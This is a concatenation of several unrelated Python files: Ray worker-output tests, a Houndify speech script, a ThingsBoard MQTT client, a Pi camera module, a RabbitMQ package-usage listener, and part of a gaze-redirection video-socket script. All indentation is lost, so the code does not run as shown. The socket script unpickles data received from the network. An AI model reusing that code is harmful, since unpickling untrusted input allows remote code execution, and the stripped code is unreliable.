directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self):
self.x = module.temporary_python_file()
a = Foo.remote()
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str)
print(err_str)
assert "ModuleNotFoundError: No module named" in err_str
assert "RuntimeError: The actor with name Foo failed to import" in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_fail_importing_task(ray_start_regular, error_pubsub):
script = """
import os
import sys
import tempfile
import ray
ray.init()
temporary_python_file = '''
def temporary_helper_function():
return 1
'''
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def foo():
return module.temporary_python_file()
ray.get(foo.remote())
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str)
print(err_str)
assert "ModuleNotFoundError: No module named" in err_str
assert "RuntimeError: The remote function failed to import" in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_worker_stdout():
script = """
import ray
import sys
ray.init(num_cpus=2)
@ray.remote
def foo(out_str, err_str):
print(out_str)
print(err_str, file=sys.stderr)
ray.get(foo.remote("abc", "def"))
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
assert out_str.endswith("abc\n"), out_str
assert "(foo pid=" in out_str, out_str
assert err_str.split("\n")[-2].endswith("def")
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_core_worker_error_message():
script = """
import ray
import sys
ray.init(local_mode=True)
# In local mode this generates an ERROR level log.
ray._private.utils.push_error_to_driver(
ray.worker.global_worker, "type", "Hello there")
"""
proc = run_string_as_driver_nonblocking(script)
err_str = proc.stderr.read().decode("ascii")
assert "Hello there" in err_str, err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_disable_driver_logs_breakpoint():
script = """
import time
import os
import ray
import sys
import threading
ray.init(num_cpus=2)
@ray.remote
def f():
while True:
time.sleep(1)
print("hello there")
sys.stdout.flush()
def kill():
time.sleep(5)
sys.stdout.flush()
time.sleep(1)
os._exit(0)
t = threading.Thread(target=kill)
t.start()
x = f.remote()
time.sleep(2) # Enough time to print one hello.
ray.util.rpdb._driver_set_trace() # This should disable worker logs.
# breakpoint() # Only works in Py3.7+
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
num_hello = out_str.count("hello")
assert num_hello >= 1, out_str
assert num_hello < 3, out_str
assert "Temporarily disabling Ray worker logs" in out_str, out_str
# TODO(ekl) nice to test resuming logs too, but it's quite complicated
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_multi_stdout():
script = """
import ray
import sys
ray.init(num_cpus=1)
@ray.remote
def foo():
print()
@ray.remote
def bar():
print()
@ray.remote
def baz():
print()
ray.get(foo.remote())
ray.get(bar.remote())
ray.get(baz.remote())
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
assert "(foo pid=" in out_str, out_str
assert "(bar pid=" in out_str, out_str
assert "(baz pid=" in out_str, out_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_actor_stdout():
script = """
import ray
ray.init(num_cpus=2)
@ray.remote
class Actor1:
def f(self):
print("hi")
@ray.remote
class Actor2:
def __init__(self):
print("init")
self.name = "ActorX"
def f(self):
print("bye")
def __repr__(self):
return self.name
a = Actor1.remote()
ray.get(a.f.remote())
b = Actor2.remote()
ray.get(b.f.remote())
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
print(out_str)
assert "hi" in out_str, out_str
assert "(Actor1 pid=" in out_str, out_str
assert "bye" in out_str, out_str
assert re.search("Actor2 pid=.*init", out_str), out_str
assert not re.search("ActorX pid=.*init", out_str), out_str
assert re.search("ActorX pid=.*bye", out_str), out_str
assert not re.search("Actor2 pid=.*bye", out_str), out_str
def test_output():
# Use subprocess to execute the __main__ below.
outputs = subprocess.check_output(
[sys.executable, __file__, "_ray_instance"],
stderr=subprocess.STDOUT).decode()
lines = outputs.split("\n")
for line in lines:
print(line)
assert len(lines) == 2, lines
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "_ray_instance":
# Set object store memory very low so that it won't complain
# about low shm memory in Linux environment.
# The test failures currently complain it only has 2 GB memory,
# so let's set it much lower than that.
MB = 1000**2
ray.init(num_cpus=1, object_store_memory=(100 * MB))
ray.shutdown()
else:
sys.exit(pytest.main(["-v", __file__]))
|
microphone.py
|
import speech_recognition as sr
from time import sleep
from threading import Thread
from queue import Queue
import os
class MicrophoneStream:
HOUNDIFY_CLIENT_ID = os.environ['HOUNDIFY_CLIENT_ID']
HOUNDIFY_CLIENT_KEY = os.environ['HOUNDIFY_CLIENT_KEY']
def __init__(self):
self.recognizer = sr.Recognizer()
self.microphone = sr.Microphone()
self.audio_queue = Queue()
def recognize_worker(self):
while True:
audio = self.audio_queue.get()
if audio is None: break
try:
print(self.recognizer.recognize_houndify(audio, client_id=MicrophoneStream.HOUNDIFY_CLIENT_ID, client_key=MicrophoneStream.HOUNDIFY_CLIENT_KEY))
except sr.UnknownValueError:
print('Unable to understand')
except sr.RequestError as e:
print("Could not request results from Houndify service; {0}".format(e))
self.audio_queue.task_done() # mark the audio processing job as completed in the queue
def listen(self):
# start a new thread to recognize audio, while this thread focuses on listening
recognize_thread = Thread(target=self.recognize_worker)
recognize_thread.daemon = True
recognize_thread.start()
with self.microphone as source:
self.recognizer.adjust_for_ambient_noise(source)
try:
while True: # repeatedly listen for phrases and put the resulting audio on the audio processing job queue
self.audio_queue.put(self.recognizer.listen(source))
except KeyboardInterrupt: # allow Ctrl + C to shut down the program
pass
self.audio_queue.join() # block until all current audio processing jobs are done
self.audio_queue.put(None) # tell the recognize_thread to stop
recognize_thread.join() # wait for the recognize_thread to actually stop
if __name__ == "__main__":
m = MicrophoneStream()
m.listen()
|
tb_device_mqtt.py
|
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import queue
import ssl
import time
from threading import RLock
from threading import Thread
import paho.mqtt.client as paho
from simplejson import dumps
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
RPC_RESPONSE_TOPIC = 'v1/devices/me/rpc/response/'
RPC_REQUEST_TOPIC = 'v1/devices/me/rpc/request/'
ATTRIBUTES_TOPIC = 'v1/devices/me/attributes'
ATTRIBUTES_TOPIC_REQUEST = 'v1/devices/me/attributes/request/'
ATTRIBUTES_TOPIC_RESPONSE = 'v1/devices/me/attributes/response/'
TELEMETRY_TOPIC = 'v1/devices/me/telemetry'
log = logging.getLogger("tb_connection")
class TBTimeoutException(Exception):
pass
class TBQoSException(Exception):
pass
class TBPublishInfo:
TB_ERR_AGAIN = -1
TB_ERR_SUCCESS = 0
TB_ERR_NOMEM = 1
TB_ERR_PROTOCOL = 2
TB_ERR_INVAL = 3
TB_ERR_NO_CONN = 4
TB_ERR_CONN_REFUSED = 5
TB_ERR_NOT_FOUND = 6
TB_ERR_CONN_LOST = 7
TB_ERR_TLS = 8
TB_ERR_PAYLOAD_SIZE = 9
TB_ERR_NOT_SUPPORTED = 10
TB_ERR_AUTH = 11
TB_ERR_ACL_DENIED = 12
TB_ERR_UNKNOWN = 13
TB_ERR_ERRNO = 14
TB_ERR_QUEUE_SIZE = 15
def __init__(self, message_info):
self.message_info = message_info
# pylint: disable=invalid-name
def rc(self):
return self.message_info.rc
def mid(self):
return self.message_info.mid
def get(self):
self.message_info.wait_for_publish()
return self.message_info.rc
class TBDeviceMqttClient:
def __init__(self, host, port=1883, token=None):
self._client = paho.Client()
self.__host = host
self.__port = port
if token == "":
log.warning("token is not set, connection without tls wont be established")
else:
self._client.username_pw_set(token)
self._lock = RLock()
self._attr_request_dict = {}
self.stopped = False
self.__timeout_queue = queue.Queue()
self.__timeout_thread = Thread(target=self.__timeout_check)
self.__timeout_thread.daemon = True
self.__timeout_thread.start()
self.__is_connected = False
self.__device_on_server_side_rpc_response = None
self.__connect_callback = None
self.__device_max_sub_id = 0
self.__device_client_rpc_number = 0
self.__device_sub_dict = {}
self.__device_client_rpc_dict = {}
self.__attr_request_number = 0
self._client.on_connect = self._on_connect
# self._client.on_log = self._on_log
self._client.on_publish = self._on_publish
self._client.on_message = self._on_message
self._client.on_disconnect = self._on_disconnect
# def _on_log(self, client, userdata, level, buf):
# if isinstance(buf, Exception):
# log.exception(buf)
# else:
# log.debug("%s - %s - %s - %s", client, userdata, level, buf)
def _on_publish(self, client, userdata, result):
# log.debug("Data published to ThingsBoard!")
pass
def _on_disconnect(self, client, userdata, result_code):
prev_level = log.level
log.setLevel("DEBUG")
log.debug("Disconnected client: %s, user data: %s, result code: %s", str(client), str(userdata), str(result_code))
log.setLevel(prev_level)
def _on_connect(self, client, userdata, flags, result_code, *extra_params):
result_codes = {
1: "incorrect protocol version",
2: "invalid client identifier",
3: "server unavailable",
4: "bad username or password",
5: "not authorised",
}
if self.__connect_callback:
time.sleep(.05)
self.__connect_callback(client, userdata, flags, result_code, *extra_params)
if result_code == 0:
self.__is_connected = True
log.info("connection SUCCESS")
self._client.subscribe(ATTRIBUTES_TOPIC, qos=1)
self._client.subscribe(ATTRIBUTES_TOPIC + "/response/+", 1)
self._client.subscribe(RPC_REQUEST_TOPIC + '+')
self._client.subscribe(RPC_RESPONSE_TOPIC + '+', qos=1)
else:
if result_code in result_codes:
log.error("connection FAIL with error %s %s", result_code, result_codes[result_code])
else:
log.error("connection FAIL with unknown error")
def is_connected(self):
return self.__is_connected
def connect(self, callback=None, min_reconnect_delay=1, timeout=120, tls=False, ca_certs=None, cert_file=None, key_file=None, keepalive=60):
if tls:
self._client.tls_set(ca_certs=ca_certs,
certfile=cert_file,
keyfile=key_file,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_TLSv1_2,
ciphers=None)
self._client.tls_insecure_set(False)
self._client.connect(self.__host, self.__port, keepalive=keepalive)
self.reconnect_delay_set(min_reconnect_delay, timeout)
self._client.loop_start()
self.__connect_callback = callback
def disconnect(self):
self._client.disconnect()
log.debug(self._client)
log.debug("Disconnecting from ThingsBoard")
self.__is_connected = False
self._client.loop_stop()
def stop(self):
self.stopped = True
def _on_message(self, client, userdata, message):
content = TBUtility.decode(message)
self._on_decoded_message(content, message)
def _on_decoded_message(self, content, message):
if message.topic.startswith(RPC_REQUEST_TOPIC):
request_id = message.topic[len(RPC_REQUEST_TOPIC):len(message.topic)]
if self.__device_on_server_side_rpc_response:
self.__device_on_server_side_rpc_response(request_id, content)
elif message.topic.startswith(RPC_RESPONSE_TOPIC):
with self._lock:
request_id = int(message.topic[len(RPC_RESPONSE_TOPIC):len(message.topic)])
callback = self.__device_client_rpc_dict.pop(request_id)
callback(request_id, content, None)
elif message.topic == ATTRIBUTES_TOPIC:
dict_results = []
with self._lock:
# callbacks for everything
if self.__device_sub_dict.get("*"):
for subscription_id in self.__device_sub_dict["*"]:
dict_results.append(self.__device_sub_dict["*"][subscription_id])
# specific callback
keys = content.keys()
keys_list = []
for key in keys:
keys_list.append(key)
# iterate through message
for key in keys_list:
# find key in our dict
if self.__device_sub_dict.get(key):
for subscription in self.__device_sub_dict[key]:
dict_results.append(self.__device_sub_dict[key][subscription])
for res in dict_results:
res(content, None)
elif message.topic.startswith(ATTRIBUTES_TOPIC_RESPONSE):
with self._lock:
req_id = int(message.topic[len(ATTRIBUTES_TOPIC+"/response/"):])
# pop callback and use it
callback = self._attr_request_dict.pop(req_id)
callback(content, None)
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way through their network flow at once.
Defaults to 20. Increasing this value will consume more memory but can increase throughput."""
self._client.max_inflight_messages_set(inflight)
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of outgoing messages with QoS>0 that can be pending in the outgoing message queue.
Defaults to 0. 0 means unlimited. When the queue is full, any further outgoing messages would be dropped."""
self._client.max_queued_messages_set(queue_size)
def reconnect_delay_set(self, min_delay=1, max_delay=120):
"""The client will automatically retry connection. Between each attempt it will wait a number of seconds
between min_delay and max_delay. When the connection is lost, initially the reconnection attempt is delayed
of min_delay seconds. It’s doubled between subsequent attempt up to max_delay. The delay is reset to min_delay
when the connection complete (e.g. the CONNACK is received, not just the TCP connection is established)."""
self._client.reconnect_delay_set(min_delay, max_delay)
def send_rpc_reply(self, req_id, resp, quality_of_service=1, wait_for_publish=False):
if quality_of_service not in (0, 1):
log.error("Quality of service (qos) value must be 0 or 1")
return None
info = self._client.publish(RPC_RESPONSE_TOPIC + req_id, resp, qos=quality_of_service)
if wait_for_publish:
info.wait_for_publish()
def send_rpc_call(self, method, params, callback):
with self._lock:
self.__device_client_rpc_number += 1
self.__device_client_rpc_dict.update({self.__device_client_rpc_number: callback})
rpc_request_id = self.__device_client_rpc_number
payload = {"method": method, "params": params}
self._client.publish(RPC_REQUEST_TOPIC + str(rpc_request_id),
dumps(payload),
qos=1)
def set_server_side_rpc_request_handler(self, handler):
self.__device_on_server_side_rpc_response = handler
def publish_data(self, data, topic, qos):
data = dumps(data)
if qos not in (0, 1):
log.exception("Quality of service (qos) value must be 0 or 1")
raise TBQoSException("Quality of service (qos) value must be 0 or 1")
return TBPublishInfo(self._client.publish(topic, data, qos))
def send_telemetry(self, telemetry, quality_of_service=1):
if not isinstance(telemetry, list) and not (isinstance(telemetry, dict) and telemetry.get("ts") is not None):
telemetry = [telemetry]
return self.publish_data(telemetry, TELEMETRY_TOPIC, quality_of_service)
def send_attributes(self, attributes, quality_of_service=1):
return self.publish_data(attributes, ATTRIBUTES_TOPIC, quality_of_service)
def unsubscribe_from_attribute(self, subscription_id):
with self._lock:
for attribute in self.__device_sub_dict:
if self.__device_sub_dict[attribute].get(subscription_id):
del self.__device_sub_dict[attribute][subscription_id]
log.debug("Unsubscribed from %s, subscription id %i", attribute, subscription_id)
if subscription_id == '*':
self.__device_sub_dict = {}
self.__device_sub_dict = dict((k, v) for k, v in self.__device_sub_dict.items() if v)
def subscribe_to_all_attributes(self, callback):
return self.subscribe_to_attribute("*", callback)
def subscribe_to_attribute(self, key, callback):
with self._lock:
self.__device_max_sub_id += 1
if key not in self.__device_sub_dict:
self.__device_sub_dict.update({key: {self.__device_max_sub_id: callback}})
else:
self.__device_sub_dict[key].update({self.__device_max_sub_id: callback})
log.debug("Subscribed to %s with id %i", key, self.__device_max_sub_id)
return self.__device_max_sub_id
def request_attributes(self, client_keys=None, shared_keys=None, callback=None):
msg = {}
if client_keys:
tmp = ""
for key in client_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"clientKeys": tmp})
if shared_keys:
tmp = ""
for key in shared_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"sharedKeys": tmp})
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
info = self._client.publish(topic=ATTRIBUTES_TOPIC_REQUEST + str(self.__attr_request_number),
payload=dumps(msg),
qos=1)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def _add_timeout(self, attr_request_number, timestamp):
self.__timeout_queue.put({"ts": timestamp, "attribute_request_id": attr_request_number})
def _add_attr_request_callback(self, callback):
with self._lock:
self.__attr_request_number += 1
self._attr_request_dict.update({self.__attr_request_number: callback})
attr_request_number = self.__attr_request_number
return attr_request_number
def __timeout_check(self):
while not self.stopped:
if not self.__timeout_queue.empty():
item = self.__timeout_queue.get_nowait()
if item is not None:
while not self.stopped:
current_ts_in_millis = int(round(time.time() * 1000))
if current_ts_in_millis > item["ts"]:
break
time.sleep(0.001)
with self._lock:
callback = None
if item.get("attribute_request_id"):
if self._attr_request_dict.get(item["attribute_request_id"]):
callback = self._attr_request_dict.pop(item["attribute_request_id"])
elif item.get("rpc_request_id"):
if self.__device_client_rpc_dict.get(item["rpc_request_id"]):
callback = self.__device_client_rpc_dict.pop(item["rpc_request_id"])
if callback is not None:
callback(None, TBTimeoutException("Timeout while waiting for a reply from ThingsBoard!"))
else:
time.sleep(0.01)
|
camera_pi.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# camera_pi.py
#
#
#
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (960, 720)
camera.hflip = True
camera.vflip = True
# let camera warm up
camera.start_preview()
time.sleep(2)
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
|
listen.py
|
import os
import sys
import json
import time
import argparse
import threading
import collections
import pika
from rez.config import config
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--verbose", action="count")
parser.add_argument("--file")
parser.add_argument("--save-interval", default=2, type=int)
opts = parser.parse_args()
# Dictionary with..
# - host: {
# - user: [{
# - qualifiedPackageName
# - lastUsed
# - firstUsed
# }]
# }
history = collections.defaultdict(lambda: collections.defaultdict(dict))
state = {"updated": False, "running": True}
if opts.file:
fname = os.path.expanduser(opts.file)
fname = os.path.abspath(fname)
fname = os.path.normpath(fname)
try:
with open(fname) as f:
history = json.load(f)
except OSError:
# Clean slate
pass
def update_db():
"""Update output every so often, but not on every message"""
while True:
if not state["running"]:
break
if state["updated"]:
state["updated"] = False
with open(fname, "w") as f:
json.dump(history, f, indent=2, sort_keys=True)
if opts.verbose:
print("Updated '%s'" % opts.file)
time.sleep(opts.save_interval)
def on_resolve(ch, method, properties, body):
payload = json.loads(body)
try:
context = payload["context"]
except KeyError:
return sys.stderr.write(" [x] Unexpected message: %s\n" % body)
host = history[payload["host"]]
user = host[payload["user"]]
for pkg in context["resolved_packages"]:
name = "{name}-{version}".format(**pkg["variables"])
timestamp = context["timestamp"]
if name not in user:
user[name] = {
"firstUsed": timestamp,
}
user[name]["lastUsed"] = timestamp
state["updated"] = True
if not opts.file:
print(json.dumps(payload, indent=2, sort_keys=True))
if opts.verbose:
packages = history[payload["host"]][payload["user"]]
for name, stats in packages.items():
print("%s [%s, %s]" % (name,
stats["firstUsed"],
stats["lastUsed"]))
print("")
host = config.context_tracking_host
param = pika.ConnectionParameters(host=host)
connection = pika.BlockingConnection(param)
channel = connection.channel()
channel.basic_consume(queue='myqueue',
on_message_callback=on_resolve,
auto_ack=True)
if opts.file:
print(' [*] Saving messages to %s' % fname)
thread = threading.Thread(target=update_db)
thread.daemon = True
thread.start()
try:
print(' [*] Listening for context resolves @ %s' % host)
channel.start_consuming()
except KeyboardInterrupt:
state["running"] = False
print("Graceful shutdown")
|
regz_socket_MP_FD.py
|
# coding: utf-8
# # load package and settings
# In[ ]:
import cv2
import sys
import dlib
import time
import socket
import struct
import numpy as np
import tensorflow as tf
# from win32api import GetSystemMetrics
# import win32gui
from threading import Thread, Lock
import multiprocessing as mp
from config import get_config
import pickle
import math
# In[ ]:
conf,_ = get_config()
if conf.mod == 'flx':
import flx as model
else:
sys.exit("Wrong Model selection: flx or deepwarp")
# system parameters
model_dir = './'+conf.weight_set+'/warping_model/'+conf.mod+'/'+ str(conf.ef_dim) + '/'
size_video = [640,480]
# fps = 0
P_IDP = 5
depth = -50
# for monitoring
# environment parameter
Rs = (1400,900)
# In[ ]:
model_dir
print(Rs)
# In[ ]:
# video receiver
class video_receiver:
def __init__(self,shared_v,lock):
self.close = False
self.video_recv = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print('Socket created')
# global remote_head_Center
self.video_recv.bind(('',conf.recver_port))
self.video_recv.listen(10)
print('Socket now listening')
self.conn, self.addr=self.video_recv.accept()
# face detection
self.detector = dlib.get_frontal_face_detector()
self.predictor = dlib.shape_predictor("./lm_feat/shape_predictor_68_face_landmarks.dat")
self.face_detect_size = [320,240]
self.x_ratio = size_video[0]/self.face_detect_size[0]
self.y_ratio = size_video[1]/self.face_detect_size[1]
self.start_recv(shared_v,lock)
def face_detection(self,frame,shared_v,lock):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_detect_gray = cv2.resize(gray,(self.face_detect_size[0],self.face_detect_size[1]))
detections = self.detector(face_detect_gray, 0)
coor_remote_head_center=[0,0]
for k,bx in enumerate(detections):
coor_remote_head_center = [int((bx.left()+bx.right())*self.x_ratio/2),
int((bx.top()+bx.bottom())*self.y_ratio/2)]
break
# share remote participant's eye to the main process
lock.acquire()
shared_v[0] = coor_remote_head_center[0]
shared_v[1] = coor_remote_head_center[1]
lock.release()
def start_recv(self,shared_v,lock):
data = b""
payload_size = struct.calcsize("L")
print("payload_size: {}".format(payload_size))
while True:
while len(data) < payload_size:
data += self.conn.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_msg_size)[0]
while len(data) < msg_size:
data += self.conn.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
if frame == 'stop':
print('stop')
cv2.destroyWindow("Remote")
break
frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
# face detection
self.video_recv_hd_thread = Thread(target=self.face_detection, args=(frame,shared_v,lock))
self.video_recv_hd_thread.start()
cv2.imshow('Remote',frame)
cv2.waitKey(1)
# # Flx-gaze
# In[ ]:
class gaze_redirection_system:
def __init__(self,shared_v,lock):
#Landmark identifier. Set the filename to whatever you named the downloaded file
self.detector = dlib.get_frontal_face_detector()
self.predictor = dlib.shape_predictor("./lm_feat/shape_predictor_68_face_landmarks.dat")
self.size_df = (320,240)
self.size_I = (48,64)
# initial value
self.Rw = [0,0]
self.Pe_z = -60
#### get configurations
self.f = conf.f
self.Ps = (conf.S_W,conf.S_H)
self.Pc = (conf.P_c_x,conf.P_c_y,conf.P_c_z)
self.Pe = [self.Pc[0],self.Pc[1],self.Pe_z] # H,V,D
## start video sender
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.client_socket.connect((conf.tar_ip, conf.sender_port))
self.encode_param=[int(cv2.IMWRITE_JPEG_QUALITY),90]
# load model to gpu
print("Loading model of [L] eye to GPU")
with tf.Graph().as_default() as g:
# define placeholder for inputs to network
with tf.name_scope('inputs'):
self.LE_input_img = tf.placeholder(tf.float32, [None, conf.height, conf.width, conf.channel], name="input_img")
self.LE_input_fp = tf.placeholder(tf.float32, [None, conf.height, conf.width,conf.ef_dim], name="input_fp")
self.LE_input_ang = tf.placeholder(tf.float32, [None, conf.agl_dim], name="input_ang")
self.LE_phase_train = tf.placeholder(tf.bool, name='phase_train') # a bool for batch_normalization
self.LE_img_pred, _, _ = model.inference(self.LE_input_img, self.LE_input_fp, self.LE_input_ang, self.LE_phase_train, conf)
# split modle here
self.L_sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,log_device_placement=False), graph = g)
# load model
saver = tf.train.Saver(tf.global_variables())
ckpt = tf.train.get_checkpoint_state(model_dir+'L/')
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(self.L_sess, ckpt.model_checkpoint_path)
else:
print('No checkpoint file found')
print("Loading model of [R] eye to GPU")
with tf.Graph().as_default() as g2:
# define placeholder for inputs to network
with tf.name_scope('inputs'):
self.RE_input_img = tf.placeholder(tf.float32, [None, conf.height, conf.width, conf.channel], name="input_img")
self.RE_input_fp = tf.placeholder(tf.float32, [None, conf.height, conf.width,conf.ef_dim], name="input_fp")
self.RE_input_ang = tf.placeholder(tf.float32, [None, conf.agl_dim], name="input_ang")
self.RE_phase_train = tf.placeholder(tf.bool, name='phase_train') # a bool for batch_normalization
self.RE_img_pred, _, _ = model.inference(self.RE_input_img, self.RE_input_fp, self.RE_input_ang, self.RE_phase_train, conf)
# split modle here
self.R_sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,log_device_placement=False), graph = g2)
# load model
saver = tf.train.Saver(tf.global_variables())
ckpt = tf.train.get_checkpoint_state(model_dir+'R/')
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(self.R_sess, ckpt.model_checkpoint_path)
else:
print('No checkpoint file found')
self.run(shared_v,lock)
def monitor_para(self,frame,fig_alpha,fig_eye_pos,fig_R_w):
cv2.rectangle(frame,
(size_video[0]-150,0),(size_video[0],55),
(255,255,255),-1
)
cv2.putText(frame,
'Eye:['+str(int(fig_eye_pos[0])) +','+str(int(fig_eye_pos[1]))+','+str(int(fig_eye_pos[2]))+']',
(size_video[0]-140,15), cv2.FONT_HERSHEY_SIMPLEX, 0.4,(0,0,255),1,cv2.LINE_AA)
cv2.putText(frame,
'alpha:[V='+str(int(fig_alpha[0])) + ',H='+ str(int(fig_alpha[1]))+']',
(size_video[0]-140,30),cv2.FONT_HERSHEY_SIMPLEX,0.4,(0,0,255),1,cv2.LINE_AA)
cv2.putText(frame,
'R_w:['+str(int(fig_R_w[0])) + ','+ str(int(fig_R_w[1]))+']',
(size_video[0]-140,45),cv2.FONT_HERSHEY_SIMPLEX,0.4,(0,0,255),1,cv2.LINE_AA)
return frame
def get_inputs(self, frame, shape, pos = "L", size_I = [48,64]):
if(pos == "R"):
lc = 36
rc = 39
FP_seq = [36,37,38,39,40,41]
elif(pos == "L"):
lc = 42
rc = 45
FP_seq = [45,44,43,42,47,46]
else:
print("Error: Wrong Eye")
eye_cx = (shape.part(rc).x+shape.part(lc).x)*0.5
eye_cy = (shape.part(rc).y+shape.part(lc).y)*0.5
eye_center = [eye_cx, eye_cy]
eye_len = np.absolute(shape.part(rc).x - shape.part(lc).x)
bx_d5w = eye_len*3/4
bx_h = 1.5*bx_d5w
sft_up = bx_h*7/12
sft_low = bx_h*5/12
img_eye = frame[int(eye_cy-sft_up):int(eye_cy+sft_low),int(eye_cx-bx_d5w):int(eye_cx+bx_d5w)]
ori_size = [img_eye.shape[0],img_eye.shape[1]]
LT_coor = [int(eye_cy-sft_up), int(eye_cx-bx_d5w)] # (y,x)
img_eye = cv2.resize(img_eye, (size_I[1],size_I[0]))
# create anchor maps
ach_map = []
for i,d in enumerate(FP_seq):
resize_x = int((shape.part(d).x-LT_coor[1])*size_I[1]/ori_size[1])
resize_y = int((shape.part(d).y-LT_coor[0])*size_I[0]/ori_size[0])
# y
ach_map_y = np.expand_dims(np.expand_dims(np.arange(0, size_I[0]) - resize_y, axis=1), axis=2)
ach_map_y = np.tile(ach_map_y, [1,size_I[1],1])
# x
ach_map_x = np.expand_dims(np.expand_dims(np.arange(0, size_I[1]) - resize_x, axis=0), axis=2)
ach_map_x = np.tile(ach_map_x, [size_I[0],1,1])
if (i ==0):
ach_map = np.concatenate((ach_map_x, ach_map_y), axis=2)
else:
ach_map = np.concatenate((ach_map, ach_map_x, ach_map_y), axis=2)
return img_eye/255, ach_map, eye_center, ori_size, LT_coor
def shifting_angles_estimator(self, R_le, R_re,shared_v,lock):
# get P_w
try:
tar_win = win32gui.FindWindow(None, "Remote")
#left, top, reight, bottom
Rw_lt = win32gui.GetWindowRect(tar_win)
size_window = (Rw_lt[2]-Rw_lt[0], Rw_lt[3]-Rw_lt[1])
except:
Rw_lt = [int(Rs[0])-int(size_window[0]/2),int(Rs[1])-int(size_window[1]/2)]
size_window = (659,528)
print("Missing the window")
# get pos head
pos_remote_head = [int(size_window[0]/2),int(size_window[1]/2)]
try:
if ((shared_v[0] !=0) & (shared_v[1] !=0)):
pos_remote_head[0] = shared_v[0]
pos_remote_head[1] = shared_v[1]
except:
pos_remote_head = (int(size_window[0]/2),int(size_window[1]/2))
R_w = (Rw_lt[0]+pos_remote_head[0], Rw_lt[1]+pos_remote_head[1])
Pw = (self.Ps[0]*(R_w[0]-Rs[0]/2)/Rs[0], self.Ps[1]*(R_w[1]-Rs[1]/2)/Rs[1], 0)
# get Pe
self.Pe[2] = -(self.f*conf.P_IDP)/np.sqrt((R_le[0]-R_re[0])**2 + (R_le[1]-R_re[1])**2)
# x-axis needs flip
self.Pe[0] = -np.abs(self.Pe[2])*(R_le[0]+R_re[0]-size_video[0])/(2*self.f) + self.Pc[0]
self.Pe[1] = np.abs(self.Pe[2])*(R_le[1]+R_re[1]-size_video[1])/(2*self.f) + self.Pc[1]
# calcualte alpha
a_w2z_x = math.degrees(math.atan( (Pw[0]-self.Pe[0])/(Pw[2]-self.Pe[2])))
